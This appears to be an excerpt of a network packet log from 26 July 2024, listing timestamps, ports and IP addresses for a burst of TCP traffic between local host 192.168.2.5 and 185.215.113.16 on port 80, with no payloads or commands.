Jul 26, 2024 17:56:20.900913000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900922060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900922060 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900932074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900940895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900949955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900963068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900966883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900968075 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.900973082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.900981903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901005983 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901016951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901026011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901035070 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901040077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901045084 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901051998 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901053905 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901114941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901114941 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901813030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901823997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901832104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901840925 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901849985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901859999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901873112 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901875019 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901885033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901920080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901930094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901935101 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901935101 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901940107 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901949883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901957035 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.901959896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901969910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901979923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901989937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.901998997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902009010 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902019978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902025938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902025938 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902069092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902069092 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902740955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902751923 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902808905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902822971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902832985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902842045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902848005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902857065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902867079 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902877092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902887106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902896881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902906895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902915955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902921915 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902921915 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902925968 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902935982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902945042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902949095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902956009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902967930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.902987957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.902987957 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903028011 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903389931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903436899 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903446913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903471947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903471947 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903584003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903594017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903604031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903604031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903613091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903640032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903640032 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903769016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903778076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903779984 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903788090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903798103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903820038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.903985977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.903995991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904005051 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904015064 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904026985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904026985 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904030085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904040098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904050112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904058933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904067993 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904084921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904084921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904320955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904330015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904340029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904350996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904357910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904357910 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904364109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904422045 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904422045 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904618025 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904628038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904637098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904647112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904655933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904665947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904675007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904684067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904685020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904685020 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904695034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904704094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904714108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.904722929 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904752016 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.904784918 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905225039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905235052 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905244112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905252934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905262947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905272007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905281067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905291080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905299902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905301094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905301094 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905312061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905322075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905330896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905339956 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905349970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905359983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905369997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905373096 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905373096 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905380011 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905419111 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905419111 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905780077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905790091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905798912 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905808926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905818939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905828953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905838966 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.905864954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905864954 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.905921936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906220913 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906230927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906239986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906250000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906260967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906270981 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906280041 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906290054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906291008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906291008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906322956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906322956 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906488895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906697989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906708002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906718016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906728029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906737089 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906745911 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906747103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906755924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906765938 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906779051 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906790018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906799078 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906805038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906805038 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906809092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906819105 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906827927 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906836987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.906855106 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906864882 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.906904936 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907340050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907413960 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907422066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907445908 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907461882 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907483101 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907507896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907517910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907527924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907541990 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907568932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907577991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907588005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907593012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907593012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907598972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907609940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907638073 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907660007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907815933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907826900 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907836914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907846928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907856941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907867908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907877922 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907877922 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907880068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.907924891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.907924891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908128977 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908138037 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908148050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908157110 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908166885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908176899 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908185005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908194065 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908202887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908211946 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908212900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908212900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908227921 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908237934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908246040 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908257008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908257008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908257961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908267021 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908267975 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908294916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908304930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908312082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908312082 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908317089 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908365965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908365965 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.908987045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.908998013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909007072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909017086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909028053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909029007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909037113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909048080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909053087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909056902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909059048 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909069061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909080029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909085989 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909087896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909099102 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909102917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909112930 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909122944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909126043 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909132004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909137964 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909142971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909157991 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909157991 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909176111 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909259081 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909259081 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909390926 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909799099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909809113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909817934 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909833908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909843922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909845114 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909853935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909862995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909872055 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909881115 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909882069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909887075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909892082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909902096 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909910917 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909910917 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909912109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909921885 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909930944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909940958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909950972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909960032 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909970045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909982920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909991980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.909992933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.909992933 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910002947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910032034 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910043955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910043955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910607100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910617113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910626888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910636902 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910646915 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910659075 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910727978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910738945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910748005 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910761118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910770893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910775900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910775900 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910779953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910789013 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910789967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910799980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910816908 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910828114 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910839081 CEST	80	49705	185.215.113.16	192.168.2.5
